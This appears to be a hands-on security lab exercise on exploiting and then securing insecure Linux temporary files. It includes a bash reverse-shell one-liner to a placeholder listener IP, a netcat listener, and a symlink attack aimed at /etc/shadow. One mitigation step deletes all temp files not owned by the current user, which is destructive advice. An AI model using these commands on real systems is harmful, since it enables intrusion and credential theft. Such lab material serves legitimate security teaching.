Exercise 39: Exploiting Insecure Temporary Files

Objective: Identify and exploit insecure temporary files to escalate privileges or gain unauthorized access, and learn how to secure temporary file management.

---

Scenario: Temporary files are often used by programs to store intermediate data. If these files are not managed securely (e.g., using world-writable permissions or not being cleaned up), attackers can manipulate them to gain unauthorized access or escalate privileges. Your task is to identify such vulnerabilities, exploit them, and implement mitigation strategies.

---

Lab Setup

1. Environment:
   • A Linux system with writable temporary directories.
2. Tools Required:
   • Terminal access.

---

Lab Steps

Step 1: Search for World-Writable Temporary Directories

1. Identify writable temporary directories: find /tmp /var/tmp -type d -perm -0002 2>/dev/null
2. List files in these directories: ls -la /tmp

Step 2: Identify Vulnerable Temporary Files

1. Check for temporary files used by applications: lsof | grep /tmp
2. Look for files with insecure permissions: find /tmp -type f -perm -0002 2>/dev/null

Step 3: Exploit Temporary Files

1. If an application uses a predictable temporary file (e.g., /tmp/app.tmp):
   • Replace the file with a malicious script: echo 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1' > /tmp/app.tmp chmod +x /tmp/app.tmp
   • Replace <your_ip> and 4444 with your listener’s IP and port.
2. Set up a listener on your machine: nc -lvnp 4444
3. Wait for the application to execute the malicious file and establish a reverse shell.

Step 4: Exploit Insecure Cleanup Processes

1. If an application deletes temporary files but does not secure the deletion process:
   • Create a symbolic link to a sensitive file: ln -s /etc/shadow /tmp/app.tmp
   • Verify if the application overwrites or deletes the sensitive file.

Step 5: Test Privilege Escalation

1. Verify your access level: whoami
2. Attempt to access sensitive files or escalate privileges further.

---

Solution

Explanation:

• Temporary files with improper permissions or cleanup can be exploited to execute malicious actions or access sensitive data.

Prevention:

1. Use Secure Temporary File Management:
   • Use secure system calls like mkstemp() in applications to create temporary files.
2. Restrict Directory Permissions:
   • Ensure temporary directories have proper permissions: chmod 1777 /tmp /var/tmp
3. Validate File Ownership:
   • Restrict access to temporary files based on ownership: find /tmp -type f ! -user $(whoami) -delete
4. Monitor Temporary Files:
   • Use tools like auditd to monitor activity in /tmp: auditctl -w /tmp -p wa -k temp_monitor
5. Clean Temporary Files:
   • Regularly clean up unused temporary files using automated scripts or system services: sudo tmpwatch --mtime 24 /tmp

---

Testing and Verification

1. Attempt to manipulate temporary files after applying secure permissions to verify they are protected.
2. Test application behavior to ensure temporary files are securely created and deleted.
3. Monitor logs for suspicious activity in temporary directories.

---

Reflection

This exercise demonstrates how insecure temporary files can be exploited to escalate privileges or access sensitive data. By implementing secure file handling practices and regular monitoring, you can effectively mitigate such risks.